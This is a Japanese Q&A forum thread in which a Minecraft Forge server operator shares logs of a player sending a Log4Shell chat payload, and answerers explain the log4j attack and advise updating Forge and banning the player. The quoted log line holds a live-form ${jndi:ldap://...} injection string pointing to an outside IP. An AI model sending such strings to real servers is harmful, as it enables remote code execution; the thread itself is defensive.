ID非公開

2022/1/19 7:45

33回答

マイクラ マルチサーバーを運営してます。 1.18.1でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら

マイクラ マルチサーバーを運営してます。 1.18.1でConohaでForgeサーバーをたててます、1日立てっぱなしにしてたら [User Authenticator #2/INFO]: UUID of player FermatSleep is xxxxxx [01:13:20] [Server thread/INFO]: Using new advancement loading for net.minecraft.server.PlayerAdvancements@3xxxxx [01:13:20] [Server thread/INFO]: FermatSleep[/xxxxx] logged in with entity id 3512 at (xxxxxx) [01:13:20] [Server thread/INFO]: FermatSleep joined the game [01:13:21] [Server thread/INFO]: <FermatSleep>${jndi:ldap://185.233.105.120:1389/a} [01:13:22] [Server thread/INFO]: FermatSleep lost connection: Disconnected [01:13:22] [Server thread/INFO]: FermatSleep left the game みたいなログが残ってました。log4j?かなにかをされたと思うのですが具体的に何をされたか、何かされていた場合どう対処すればいいかわかる方いませんか?

マインクラフト | サーバ管理、保守598閲覧xmlns="http://www.w3.org/2000/svg">500

ベストアンサー

0
にゃ王

カテゴリマスター

2022/1/19 9:12

Forgeサーバーのlog4j対策としては ・サーバー側のForgeを最新版にする、ぐらいです (クライアント側も同じ) 【マイクラ】Log4j2問題に関する対処方法のまとめ【バニラ/プラグイン/Forge対応】 https://mcpoteton.com/yakudatu/log4j-problem 「MODサーバー(Forge)の場合」を参照 「脆弱性の確認方法」も載ってます 後、そのプレイヤーをBANするぐらいです 彼が何をしようとしてたかはここに https://gigazine.net/news/20211213-cve-2021-44228-jndi-lookup/ JavaのLog4jライブラリで発見された脆弱性「Log4Shell(CVE-2021-44228)」はなぜ世界中に大きな影響を与えるのか?

ID非公開

質問者2022/1/19 15:43

MODの都合で1.18.1の中では一番古いforge1.18.1-39.0.0なんですが大丈夫でしょうか? 脆弱性の確認でゲーム内でチャットを打つと2022とは出ずにというか何も出ずにチャットにコマンドが表示されるだけですがこれで良いのでしょうか?

ThanksImg質問者からのお礼コメント

ありがとうございました!

お礼日時:1/22 16:36

その他の回答(2件)

0
暇人の部屋

2022/1/22 13:18

${jndi:ldap://185.233.105.120:1389/a} はマインクラフトへのlog4jのアタック攻撃です。 マイクラへファイルのダウンロードをさせ、攻撃をするという物ですが、1.18.1なら対策済みです。 その人はBANをしましょう。 1.18.1なら攻撃はされてないのでご安心を^^

0
1150215074

2022/1/19 8:06

1.18.1はたしかその脆弱性に対して最初から対策済みのバージョンなので、多分大丈夫です。 脆弱性を突いて何らかの事をしようとしたけれど出来なかったので退散、という流れだと思います。あるいはアドレスを公開しているサーバーに片っ端からアクセスしてどこかで当たったら良いなと言う感じでバラ撒いているのかもしれません。 念の為、その『FermatSleep』さんはBANしておいたほうが良いです。

ID非公開

質問者2022/1/19 15:44

もしなにか出来ていた、されていた場合コンソールのログに何か表示されたりしますか?何も分からないので不安です。BANはしました。